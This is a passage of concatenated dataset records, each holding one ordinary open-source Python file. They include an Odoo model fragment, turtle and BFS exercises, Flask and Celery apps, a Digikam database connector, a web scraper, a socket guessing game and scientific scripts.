self.purchase_line_id.move_ids\n return stock_moves.filtered(lambda m: m.state == \"done\")\n\n def _get_account_change_stock_moves_sale(self):\n sales = self.sale_line_ids.filtered(lambda s: s.move_ids)\n return sales.move_ids\n","repo_name":"OCA/l10n-romania","sub_path":"l10n_ro_stock_account/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"76"} +{"seq_id":"31198581615","text":"# Draw 5 squares, 20 units per side. Use a functon\n\nimport turtle\n\n\ndef drawsquare(t, sz):\n \"\"\"Make turtle t draw a square of with side sz.\"\"\"\n for i in range(4):\n t.forward(sz)\n t.left(90)\n\n\nwn = turtle.Screen()\nwn.bgcolor(\"lightgreen\")\n\nalex = turtle.Turtle()\nalex.color(\"hotpink\")\nalex.pensize(3)\n\nsize = 20\nfor i in range(5):\n drawsquare(alex, size)\n alex.penup()\n alex.forward(-10)\n alex.right(90)\n alex.forward(10)\n alex.left(90)\n alex.pendown()\n size = size + 20\n\nwn.exitonclick()\n","repo_name":"BradyHodge/python_projects","sub_path":"tri1/exercise_6a.py","file_name":"exercise_6a.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13115567777","text":"import argparse\nimport sys\n# help flag provides flag help\n\n\ndef parse_arguments(arg_list=None):\n if arg_list is None:\n arg_list = sys.argv[1:]\n parser = argparse.ArgumentParser(description=\"Run a task of cronjob\")\n parser.add_argument(\n \"--debug\",\n default=False,\n action=\"store_true\",\n help=\"Run the task with little dataset and log_level=debug\",\n )\n\n # Accept extra args to override yaml\n run_opts = parser.parse_args(arg_list)\n\n # Ignore items that are \"None\", they were not passed\n run_opts = {k: v for k, v in vars(run_opts).items() if v is not None}\n\n # param_file = run_opts[\"param_file\"]\n # del run_opts[\"param_file\"]\n return run_opts","repo_name":"LIZHICHAOUNICORN/CodeTools","sub_path":"code_tools/utils/args_parse.py","file_name":"args_parse.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35307578134","text":"# from ollin.Administrator.AdmOllin import Ollin # Loading Data Base data.db \\ ..........\n# from ollin.Example.UOS import Stream, Valve, Heater, Flash\n# PR = Ollin.AddModel(\"PR\", \"PR\", 'ANTOINE') # Create a thermodynamic models and naming\n# print(PR.__dict__)\n# Ollin.Add([\"METHANE\",\"ETHANE\",\"PROPANE\",\"ISOBUTANE\",\"N-BUTANE\",\"N-PENTANE\",\"N-HEXANE\",\"N-HEPTANE\",\"N-OCTANE\",\"N-NONANE\",\"N-DECANE\",\"N-UNDECENE\"],\"PR\")\n# # Add the compounds of the mixture\n# #Ollin.Add([\"ETHANE\" \"PROPANE\", \"N-BUTANE\", \"N-PENTANE\", \"N-HEXANE\"], \"PR\")\n# Ollin.LoadConst()\n# print(PR.__dict__)\n#\n# print(\"############## Calling of AddCase() of Ollin\")\n# thermo_obj_PR = Ollin.AddCase('PR')\n# print(\"############## Calling SetX() from ThemoObj.py using ThermoObj()\")\n# thermo_obj_PR.SetX([2995.5,2395.5,2291,2991,1539.9,790.4,1129.9,1764.7,1844.5,1699,831.7,1214.5])\n#\n# #thermo_obj_PR.SetX([0.05,0.15,0.25,0.20,0.35])\n#\n# print(\"############## Calling T() from ThemoObj.py using ThermoObj()\")\n# thermo_obj_PR.T(322)\n#\n# print(\"############## Calling FracVap() from ThemoObj.py using ThermoObj()\")\n# thermo_obj_PR.FracVap(0.6)\n#\n# print(\"############## Calling P() from ThemoObj.py using ThermoObj()\")\n# thermo_obj_PR.P(1861)\n#\n# print(\"------------- ThermoObj for PR -----------\", )\n# print(thermo_obj_PR.__dict__)\n#\n# print(\"#################### Calling Ollin().Solve()\")\n# Ollin.Solve()\n# print(\"#################### Calling Ollin().Resumen()\")\n# Ollin.Resumen()\n\n\n# print(\"############# calling of Stream() from myTestExp.py ####################\")\n# S1 = Stream(PR)\n# print(\"Stream() obj dict: \")\n# print(S1.__dict__)\n# print(\"ThermoCase Model attribute from Stream() obj: \")\n# print(S1.Model.__dict__)\n# print(\"Thermodynamic Case attribute from Stream() obj: \")\n# print(S1.Case.__dict__)\n# print(\"Set Thermodynamic x property: \")\n# S1.X([2995.5,2395.5,2291,2991,1539.9,790.4,1129.9,1764.7,1844.5,1699,831.7,1214.5])\n# # Set MassFraction for Stream() obj and mole fraction of the Thermodynamic obj as ThemoObj()\n# print(\"MassFraction for Stream() obj and mole fraction of the Thermodynamic Case obj as ThemoObj() are created\")\n# print(\"Mass Fraction: \", S1.MassFraction)\n# print(\"Mole Fraction: \", S1.Case.Prop[\"x\"])\n# print(\"Set Temperature of Thermodynamic Case obj as ThemoObj()\")\n# S1.T(322)\n# print(\"Temperature: \", S1.Case.Prop[\"T\"])\n# print(\"Set Pressure of Thermodynamic Case obj as ThemoObj()\")\n# S1.P(1861)\n# print(\"Pressure: \", S1.Case.Prop[\"P\"])\n# print(\"Set MoleFlow of Stream() obj\")\n# S1.Mol(455)\n# print(\"MoleFlow: \", S1.MoleFlow)\n\n# V1 = Valve(PR)\n# V1.DP = 50\n#\n# H1 = Heater(PR)\n# H1.DP = 1\n# H1.DT = 1\n#\n#\n# print(\"############## Calling of AddCase() of Ollin\")\n# Ollin.AddCase('PR')\n# print(\"#####################################################\")\n# Ollin.Solve()\n# Ollin.Resumen()\n#########################################################################################################\nfrom ollin.Administrator.AdmOllin import Ollin\nPR = Ollin.AddModel(\"PR\", \"PR\")\nprint(PR.__dict__)\nOllin.Add([\"METHANE\",\"ETHANE\",\"PROPANE\",\"ISOBUTANE\",\"N-BUTANE\",\"N-PENTANE\",\"N-HEXANE\",\"N-HEPTANE\",\"N-OCTANE\",\"N-NONANE\"\n ,\"N-DECANE\",\"N-UNDECENE\"],\"PR\")\nOllin.LoadConst()\nprint(\"####################### Calling of AddCase() #####################################\")\nthermo_obj_PR = Ollin.AddCase('PR')\nthermo_obj_PR.SetX([2995.5,2395.5,2291,2991,1539.9,790.4,1129.9,1764.7,1844.5,1699,831.7,1214.5])\nthermo_obj_PR.T(322)\nthermo_obj_PR.P(1861)\nprint(\"################### Ollin PresureVap obj\")\nprint(PR.PresureVap)\nprint(\"#################### Calling Ollin().Solve()\")\nOllin.Solve()\nprint(\"#################### Calling Ollin().Resumen()\")\nOllin.Resumen()\n","repo_name":"psy007/NNPC-CHEMICAL-SIM-","sub_path":"ollin/Example/mycavett.py","file_name":"mycavett.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10774162120","text":"from sys import *\r\nfrom collections import * \r\nfrom heapq import * \r\nfrom functools import *\r\nfrom math import *\r\nfrom itertools import *\r\n\r\n\r\ninput = stdin.readline\r\n\r\n\r\ndx = [0,0,1,-1]\r\ndy = [1,-1,0,0]\r\n\r\nn,m = map(int,input().split())\r\n\r\n\r\nboard = [\"\" for _ in range(n)]\r\n\r\n\r\nfor i in range(n):\r\n board[i] = input()[:-1]\r\n\r\n\r\n\r\nvisit = [[0 for _ in range (m)] for _ in range(n)]\r\n\r\n\r\nvisit[0][0] = 1\r\nq = deque()\r\n\r\nq.append((0,0))\r\n\r\nwhile q:\r\n \r\n nowX,nowY = q.popleft()\r\n \r\n \r\n for i in range(4):\r\n \r\n nx = nowX + dx[i]\r\n ny = nowY + dy[i]\r\n \r\n if nx < 0 or nx >= n or ny < 0 or ny >= m or board[nx][ny] == \"0\" or visit[nx][ny] != 0:\r\n \r\n continue\r\n \r\n q.append((nx,ny))\r\n visit[nx][ny] = visit[nowX][nowY] + 1 \r\n \r\n\r\n\r\nprint(visit[n-1][m-1])\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"yongbeomkwak/BaekJoonHub","sub_path":"백준/Silver/2178. 미로 탐색/미로 탐색.py","file_name":"미로 탐색.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"11652740336","text":"from shared_db import db\nimport os\n\n\ndef setup_db(app, database_uri=os.environ['DATABASE_URL']):\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = database_uri\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n db.app = app\n db.init_app(app)\n db.create_all()\n return db\n\n'''\nOwner\n'''\n\n\nclass Owner(db.Model):\n __tablename__ = 'owners'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String, nullable=False)\n phone = db.Column(db.String, nullable=False)\n\n def __init__(self, name, phone):\n self.name = name\n self.phone = phone\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'phone': self.phone}\n\n\n'''\nPet\n'''\n\n\nclass Pet(db.Model):\n __tablename__ = 'pets'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String, nullable=False)\n species = db.Column(db.String, nullable=False)\n breed = db.Column(db.String)\n\n def __init__(self, name, species, breed=\"\"):\n self.name = name\n self.species = species\n self.breed = breed\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'species': self.species,\n 'breed': self.breed}\n\n '''\n Appointment \n '''\n\n\nclass Appointment(db.Model):\n __tablename__ = 'appointments'\n\n id = db.Column(db.Integer, primary_key=True)\n owner_id = db.Column(db.Integer, db.ForeignKey('owners.id'), nullable=False)\n pet_id = db.Column(db.Integer, db.ForeignKey('pets.id'), nullable=False)\n date = db.Column(db.String, nullable=False)\n time = db.Column(db.String, nullable=False)\n\n def __init__(self, date, time, pet_id, owner_id):\n self.date = date\n self.time = time\n self.pet_id = pet_id\n self.owner_id = owner_id\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n 'id': self.id,\n 'date': self.date,\n 'time': self.time,\n 'pet_id': self.pet_id,\n 'owner_id': self.owner_id}\n\n","repo_name":"EsNFish/fish-udacity-capstone","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23207239901","text":"#!/usr/bin/env python3\n\"\"\"HYPERPARAMETER\"\"\"\nimport numpy as np\n\n\ndef update_variables_Adam(alpha, beta1, beta2, epsilon, var, grad, v, s, t):\n \"\"\"updates a variable in place using the Adam optimization algorithm\"\"\"\n v = beta1 * v + (1 - beta1) * grad\n v_1 = v / (1-beta1**t)\n\n s = beta2*s + (1 - beta2) * grad ** 2\n s_1 = s / (1 - beta2 ** t)\n\n var = var - alpha * v_1 / (np.sqrt(s_1) + epsilon)\n return var, v, s\n","repo_name":"Immaannn2222/holbertonschool-machine_learning","sub_path":"supervised_learning/0x03-optimization/9-Adam.py","file_name":"9-Adam.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"3927224349","text":"\"\"\"\nDefines the ``Digikam`` class for database access.\n\"\"\"\n\nimport logging\nimport os\nimport re\nfrom typing import Mapping, Optional, Union\n\nfrom sqlalchemy import text, create_engine\nfrom sqlalchemy.engine import Engine\nfrom sqlalchemy.orm import Session, declarative_base\nfrom sqlalchemy.ext.declarative import DeferredReflection\n\nfrom .settings import Settings\nfrom .tags import Tags\nfrom .albumroots import AlbumRoots\nfrom .albums import Albums\nfrom .images import Images\nfrom .exceptions import DigikamError, DigikamConfigError\n\n\nlog = logging.getLogger(__name__)\n\n\nclass Digikam:\n \"\"\"\n Connection to the Digikam database.\n \n This object connects to the Digikam database using the\n :doc:`SQLAlchemy ORM `. It generates its own set of\n classes so that you can use multiple ``Digikam`` objects to connect to\n different databases.\n \n When initializing a ``Digikam`` object, you have to supply parameters to\n specify the database. This is usually done with the ``database``\n parameter. It can be one of the following:\n \n The string **\"digikamrc\"**:\n Use the local Digikam application's database configuration in\n :file:`$HOME/.config/digikamrc`.\n Any other :class:`str`:\n Use the string as database URL in :func:`~sqlalchemy.create_engine`.\n A SQLAlchemy :class:`~sqlalchemy.engine.Engine` object:\n Use this object as the database engine\n \n Access to actual data is mostly done through the following properties:\n \n * images (class :class:`~digikamdb.images.Images`)\n * tags (class :class:`~digikamdb.tags.Tags`)\n * albums (class :class:`~digikamdb.albums.Albums`)\n * albumroots (class :class:`~digikamdb.albumroots.AlbumRoots`)\n * settings (class :class:`~digikamdb.settings.Settings`)\n \n Parameters:\n database: Digikam database.\n sql_echo: Sets the ``echo`` option of SQLAlchemy.\n root_override: Can be used to override the location of album roots\n in the file system. See `Root Overrides`_ for more\n information.\n \"\"\"\n \n def __init__(\n self,\n database: Union[str, Engine],\n root_override: Optional[Mapping] = None,\n sql_echo: bool = False\n ):\n \"\"\"\n Constructor\n \"\"\"\n if isinstance(database, Engine):\n log.info(\n 'Initializing Digikam object from %s',\n database\n )\n self._engine = database\n elif isinstance(database, str):\n if database == 'digikamrc':\n log.info('Initializing Digikam object from digikamrc')\n self._engine = Digikam.db_from_config(sql_echo = sql_echo)\n else:\n log.info(\n 'Initializing Digikam object from %s',\n re.sub(r':.*@', ':XXX@', database)\n )\n self._engine = create_engine(\n database,\n future = True,\n echo = sql_echo)\n else:\n raise TypeError('Database specification must be Engine or str')\n \n self._db_version = self._get_db_version()\n \n self._session = Session(self._engine, future = True)\n\n self._base = self._digikamobject_class(declarative_base())\n \n self._settings = Settings(self)\n self._tags = Tags(self)\n self._albumRoots = AlbumRoots(self, override = root_override)\n self._albums = Albums(self)\n self._images = Images(self)\n\n self.base.prepare(self._engine)\n self.tags.setup()\n \n _db_config_keys = dict(\n db_host = 'Database Hostname',\n db_name = 'Database Name',\n db_pass = 'Database Password',\n db_port = 'Database Port',\n db_type = 'Database Type',\n db_user = 'Database Username',\n db_internal = 'Internal Database Server'\n )\n \n def _get_db_version(self) -> int:\n with self._engine.connect() as conn:\n return int(\n conn.execute(text(\n \"SELECT value FROM Settings WHERE keyword = 'DBVersion'\"\n )).one().value\n )\n \n @property\n def db_version(self) -> int:\n \"\"\"\n The Digikam database version\n \n .. versionadded:: 0.2.2\n \"\"\"\n return self._db_version\n \n @property\n def has_tags_nested_sets(self) -> bool:\n \"\"\"\n Indicates if the ``Tags`` table has nested sets\n \n .. versionadded:: 0.2.2\n \"\"\"\n return self.is_mysql and self.db_version <= 10\n \n @property\n def base(self) -> type:\n \"\"\"Base class for table-mapped classes\"\"\"\n return self._base\n \n @classmethod\n def db_from_config(cls, sql_echo = False) -> Engine: # noqa: C901\n \"\"\"\n Creates the database connection from :file:`digikamrc`.\n \n Returns:\n Database connection object\n Raises:\n DigikamConfigError: ~/.config/digikamrc cannot be read\n or interpreted.\n \"\"\"\n try:\n configfile = os.path.join(os.path.expanduser('~'), '.config/digikamrc')\n config = None\n # configparser cannot process digikamrc, so we do it manually...\n with open(configfile, 'r') as cfg:\n for line in cfg.readlines():\n line = line.strip()\n \n if config is None:\n if line == '[Database Settings]':\n config = {}\n continue\n \n if line.startswith('['):\n break\n \n if '=' not in line:\n continue\n \n key, value = line.split('=', maxsplit=1)\n key, value = key.strip(), value.strip()\n \n for key1, key2 in cls._db_config_keys.items():\n if key == key2:\n config[key1] = value\n break\n \n except DigikamError: # pragma: no cover\n raise\n except Exception as e:\n raise DigikamConfigError('Error reading config file: ' + str(e))\n \n try:\n if config['db_type'] == 'QMYSQL':\n if 'db_internal' in config and config['db_internal'].lower() != 'false':\n raise DigikamConfigError('Internal Database Server is not supported')\n \n if 'db_port' in config:\n config['db_host'] = '%s:%s' % (\n config['db_host'],\n config['db_port']\n )\n db_str = 'mysql+pymysql://%s:%s@%s/%s?charset=utf8' % (\n config['db_user'],\n config['db_pass'],\n config['db_host'],\n config['db_name'],\n )\n log.debug(\n 'Using MySQL database %s',\n db_str.replace(config['db_pass'], 'XXX')\n )\n return create_engine(db_str, future = True, echo = sql_echo)\n \n elif config['db_type'] == 'QSQLITE':\n log.debug('Using SQLite database in %s', config['db_name'])\n return create_engine(\n 'sqlite:///%s' % (\n os.path.join(config['db_name'], 'digikam4.db')\n ),\n future = True,\n echo = sql_echo)\n \n else:\n raise DigikamConfigError('Unknown database type ' + config['db_type'])\n \n except DigikamError:\n raise\n except KeyError as e: # pragma: no cover\n if e.args[0] in cls._db_config_keys:\n raise DigikamConfigError(\n 'Configuration not found: ' + cls._db_config_keys[e.args[0]]\n )\n else:\n raise\n \n raise DigikamConfigError('Unknown Database Type ' + config['db_type'])\n \n def destroy(self):\n \"\"\"\n Clears the object.\n \n This will call :meth:`~sqlalchemy.orm.Session.close` and\n :meth:`~sqlalchemy.engine.Engine.dispose` for the session and engine\n objects.\n \"\"\"\n log.info('Scrapping Digikam object')\n self._settings = None\n self._tags = None\n self._albumRoots = None\n self._albums = None\n self._images = None\n self.session.close()\n self._session = None\n self._engine.dispose()\n self._engine = None\n \n @property\n def settings(self) -> Settings:\n \"\"\"The :class:`~digikamdb.settings.Settings` object\"\"\"\n return self._settings\n \n @property\n def tags(self) -> Tags:\n \"\"\"The :class:`~digikamdb.tags.Tags` object\"\"\"\n return self._tags\n \n @property\n def albumRoots(self) -> AlbumRoots:\n \"\"\"The :class:`~digikamdb.albumroots.AlbumRoots` object\"\"\"\n return self._albumRoots\n \n @property\n def albums(self) -> Albums:\n \"\"\"The :class:`~digikamdb.albums.Albums` object\"\"\"\n return self._albums\n \n @property\n def images(self) -> Images:\n \"\"\"The :class:`~digikamdb.images.Images` object\"\"\"\n return self._images\n \n @property\n def session(self) -> Session:\n \"\"\"The SQLAlchemy ORM session\"\"\"\n return self._session\n \n @property\n def is_mysql(self) -> bool:\n \"\"\"\n ``True`` if database is MySQL\n \"\"\"\n return (self._engine.dialect.name == 'mysql')\n \n def _digikamobject_class(self, base: type) -> type:\n \"\"\"\n Defines the DigikamObject class\n \n Args:\n base: parent class (generated with :func:`declarative_base`)\n Returns:\n Class that has the parents :class:`DeferredReflection` and *base*.\n \"\"\"\n class DigikamObject(DeferredReflection, base):\n \"\"\"\n Abstract base class for objects stored in database.\n Derived from :class:`~sqlalchemy.ext.declarative.DeferredReflection`\n and :func:`~sqlalchemy.orm.declarative_base`.\n \"\"\"\n __abstract__ = True\n __mapper_args__ = {\n 'column_prefix': '_',\n }\n \n _digikam = self\n \n @property\n def digikam(self) -> Digikam:\n \"\"\"The ``Digikam`` object\"\"\"\n return self._digikam\n \n return DigikamObject\n\n\n\n","repo_name":"rcw-2/python-digikamdb","sub_path":"digikamdb/conn.py","file_name":"conn.py","file_ext":"py","file_size_in_byte":10868,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"3582291168","text":"\"\"\"\nNON-CONTEXTUAL VIEW:\npython3 main_table_2d_view.py 90 100 > data_table_2d_view_90_100_$$.txt 2>&1\n\"\"\"\n\n# IMPORTS\nimport sys\nimport os\nimport argparse\nfrom pathlib import Path\nimport numpy as np\n\nfile = Path(__file__).resolve()\nsys.path.append(file.parents[0])\n\nimport table2d.table2dfonction as table2dfonction\n\n\n# PARAMETERS\nL = 6\nPID_INF = 40\nPID_INF = 50\n\nDATA = f\"{file.parents[2]}/MNHN_RESULT/1_DATA\"\nDATA_RESULT = f\"{file.parents[2]}/MNHN_RESULT/3_TABLE_2D\"\nNAME_FASTA_TRAIN_FOLDER = \"Pfam_split/Pfam_train\"\nNAME_PID_FOLDER = \"PID\"\nALPHABET = [\"A\", \"R\", \"N\", \"D\", \"C\", \"Q\", \"E\", \"G\", \"H\", \"I\",\n \"L\", \"K\", \"M\", \"F\", \"P\", \"S\", \"T\", \"W\", \"Y\", \"V\"]\nLIST_PSEUDO_COUNTER_2D = [0,\n pow(10, -5),\n pow(10, -4),\n pow(10, -3),\n pow(10, -2),\n pow(10, -1),\n 1,\n 10]\n\n\n\n\n# PROGRAM\n\npath_folder_fasta = f\"{DATA}/{NAME_FASTA_TRAIN_FOLDER}\"\npath_folder_pid = f\"{DATA}/{NAME_PID_FOLDER}\"\npath_res = f\"{DATA_RESULT}/{args.pid_inf}_{args.pid_sup}\"\npath_res_graph = f\"{path_res}/graph\"\nif not os.path.exists(path_res_graph):\n os.makedirs(path_res_graph)\n\n# table_2d score (BLOSUM formula)\nprint(f\"\\ntable_2d_score ({args.pid_inf},{args.pid_sup}) :\\n\")\ntable_2d_score = np.load(f\"{path_res}/score.npy\", allow_pickle='TRUE').item()\ntable2dfonction.table_2d_visualisation(table_2d_score)\nname_folder_fasta = os.path.basename(path_folder_fasta)\ntitle_heatmap = f\"Heatmap de la table_2d de scores [{args.pid_inf},{args.pid_sup}] calculée sur {name_folder_fasta}\"\ntable2dfonction.table_2d_heatmap(table_2d_score, path_res_graph, title_heatmap, size_annot = 5)\n\n\n# table_2d score comparison with BLOSUM_62\nPID_INF_REF = 62\nmatrix_diff, PID_INF_REF, average_diff = table2dfonction.table_2d_difference(\n table_2d_score,\n ALPHABET,\n PID_INF_REF)\ntitle_heatmap = f\"Heatmap des différences entre la table_2d de scores [{args.pid_inf},{args.pid_sup}] et la Blosum_{PID_INF_REF} de référence\\nLa différence moyenne de score est de : {average_diff}\"\ntable2dfonction.table_2d_heatmap(matrix_diff, path_res_graph, title_heatmap, size_annot = 5)\n\n\n# table_2d probability\nfor pseudo_counter_2d in LIST_PSEUDO_COUNTER_2D:\n table_2d_proba = np.load(f\"{path_res}/proba_{pseudo_counter_2d}.npy\", allow_pickle='TRUE').item()\n table2dfonction.table_2d_visualisation(table_2d_proba)\n table2dfonction.sum_line(table_2d_proba)\n title_heatmap = f\"Heatmap de la table_2d de probabilités conditionnelles [{args.pid_inf},{args.pid_sup}] calculée sur {name_folder_fasta}\\n pseudo_counter_2d: {pseudo_counter_2d}\"\n table2dfonction.table_2d_heatmap(table_2d_proba, path_res_graph, title_heatmap, size_annot = 3)\n","repo_name":"PaulineTurk/MNHN","sub_path":"POUBELLE/main_table_2d_view.py","file_name":"main_table_2d_view.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71312710325","text":"import csv\nimport requests\nfrom bs4 import BeautifulSoup\n\ncsv_file = open(\"SBS.csv\", \"w\")\ncsv_writer = csv.writer(csv_file)\ncsv_writer.writerow([\"Period\", \"Ranking\", \"Program\", \"Rate\"])\n\nfor year in range(2010, 2019):\n for month in range(1, 13):\n for weekIndex in range(0, 5):\n response = requests.get(f\"https://workey.codeit.kr/ratings/index?year={year}&month={month}&weekIndex={weekIndex}\")\n pageCode = response.text\n soup = BeautifulSoup(pageCode, \"html.parser\")\n\n for td_tag in soup.select(\"tr\")[1:]:\n if td_tag.select_one(\".channel\").get_text() == \"SBS\":\n period = f\"Year {year} Month {month} Week {weekIndex +1}\"\n row = [\n period,\n td_tag.select_one(\".rank\").get_text(),\n td_tag.select_one(\".program\").get_text(),\n td_tag.select_one(\".percent\").get_text(),\n ]\n csv_writer.writerow(row)\n else:\n pass\n\ncsv_file.close()\n","repo_name":"hipsans/WebAuto","sub_path":"venv/SBS.py","file_name":"SBS.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40624333540","text":"from flask import Flask, request, url_for\nfrom tasks import add_task\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n name = request.args.get(\"name\", \"World\")\n return f\"Hello {name}\"\n\n\n@app.route(\"/add//\")\ndef add(a, b):\n result = add_task.delay(a, b)\n return f\"task: {result.id}\"\n\n\n@app.route(\"/get/\")\ndef get(key):\n result = add_task.AsyncResult(key)\n if result.status == \"SUCCESS\":\n return f\"result: {result.get()}\"\n else:\n return f\"status: {result.status}\"\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"blakelockley/flask-celery","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19087260037","text":"# \n# Works with Python3\n#\n# Modified by: Ryan Sowers\n# 03/06/2018\n#\n# Step 3: Enhance the server code further to support game logic and starting of new game.\n# Final product.\n#\n# Run: python3 Sowers_TCPclientP3.py IP\n#\n\nimport socket\nimport sys\n\n# Create a TCP/IP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nif len(sys.argv) < 2:\n print (\"Please provide , e.g., localhost on the command line!\")\n exit(1)\n\n# Connect the socket to the port on the server given by the caller\nserver_address = (sys.argv[1], 10000)\t\t# socket id\nprint(\"connecting to %s port %s\" % server_address)\nsock.connect(server_address)\t\t\t\t# connect to socket\n\ntry:\n \n\tdata = sock.recv(1024)\n\tprint(data.decode())\t\t# receive \"Welcome to...\"\n\n\tdata = sock.recv(1024)\n\tprint(data.decode())\t\t# receive \"Please guess...\"\n\n\t\n\twhile True:\n\t\ttry:\n\t\t\tnumber = int(input(\"Guess: \"))\t\t\t# verify input to be integer and not other string\n\t\texcept ValueError:\n\t\t\tprint(\"That's not a number.\")\n\t\t\tprint(\"Please choose a number between 1 and 100.\")\n\t\telse:\n\t\t\tbreak\n\n\twhile ((number < 1) or (number > 100)):\t\t\t# verify input to be in desired range\n\t\tprint(\"Please choose a number between 1 and 100.\")\n\t\ttry:\n\t\t\tnumber = int(input(\"Guess: \"))\n\t\texcept ValueError:\n\t\t\tprint(\"That's not a number.\")\n\n\tnumber = str(number)\t\t\t\t\t\t\t# convert back to string because that's what we're encoding as\n\tprint(\"Sending your guess: %s\" % number)\n\tsock.sendall(bytes(number, 'utf-8'))\t\t\t# send guess. tried: sock.sendall(bytes(number)) to send int\n\n\tdata = sock.recv(1024)\n\tprint(data.decode())\t\t# receive \"You guessed...\" game ending message\n\nfinally:\n sock.close()\n","repo_name":"ryandsowers/NetworkGame","sub_path":"Sowers_TCPclientP3.py","file_name":"Sowers_TCPclientP3.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35387670263","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 24 18:03:47 2020\n\n@author: ajay\n\"\"\"\n\n'''\nLoad data from csv into pandas, viz using seaborn\n'''\n\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#Load csv data\ndf = pd.read_csv('./trainData.csv')\n\n#Split labels and data\nlabels = np.array(df.pop('y'))\nx = np.array(df.pop('x'))\n\n#Split data into corresponding labels\nx_1 = x[labels==1]\nx_2 = x[labels==2]\n\n#Plot distributions of data\nplt.figure()\nsns.kdeplot(x_1)\nsns.kdeplot(x_2)\n\nplt.figure()\nsns.kdeplot(x_1,x_2)","repo_name":"ajaynr/geneticAlgo","sub_path":"vizData.py","file_name":"vizData.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36781792278","text":"import numpy as np\nimport h5py\nimport dask.array as da\n\nfilename = '/Users/pbw/data/sample_A/sample_A_20160501.hdf'\nsource_data = h5py.File(filename, 'r')\nraw = np.asarray(source_data['volumes/raw'])\nlabels = np.asarray(source_data['volumes/labels/neuron_ids'])\n\nraw_dask = da.from_array(raw, chunks=(1, 1250, 1250))\nda.to_zarr(raw_dask, 'raw.zarr')\nlabels_dask = da.from_array(labels, chunks=(1, 1250, 1250))\nda.to_zarr(labels_dask, 'labels.zarr')\n","repo_name":"pwinston/napari-pwinston","sub_path":"cremi-hdf2zarr.py","file_name":"cremi-hdf2zarr.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40537707400","text":"import requests\nimport unittest\nimport json\n\nclass get_listAll(object):\n def __init__(self):\n self.url = 'https://beta.fengjr.com/fengInfo/api/v2/common/getListAll'\n self.headers = {\n 'Authorization': \"Bearer Rxp1GxIn2VC27ylFIdy3Sh4WNMVSslm38AjNHB7vPhj0oLnRMiiirC73wbXG7o9x\"\n }\n self.params = {\n \"category_type\": \"16\",\n \"page_size\": \"10\",\n \"user_id\": \"22B52EA7-5D85-44BF-8E89-96D3F43E2597\",\n \"version\": \"2.0\"}\n def test01(self):\n self.response = requests.get(url=self.url,headers=self.headers,params=self.params)\n \n\nif __name__ == '__main__':\n obj = get_listAll()\n obj.test01()\n","repo_name":"iliun/apiStudy","sub_path":"study/jk01.py","file_name":"jk01.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20889013965","text":"\"\"\"\n.. module:: fixbatch.py\n\nfixbatch.py\n******\n\n:Description: fixbatch.py\n\n Different Auxiliary functions used for different purposes\n\n:Authors:\n bejar\n\n:Version: \n\n:Date: 26/08/2021\n\"\"\"\n\n__author__ = 'bejar'\n\n\nimport argparse\nimport json\nimport glob\nimport os\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch', type=int, help='batchsize')\n\n 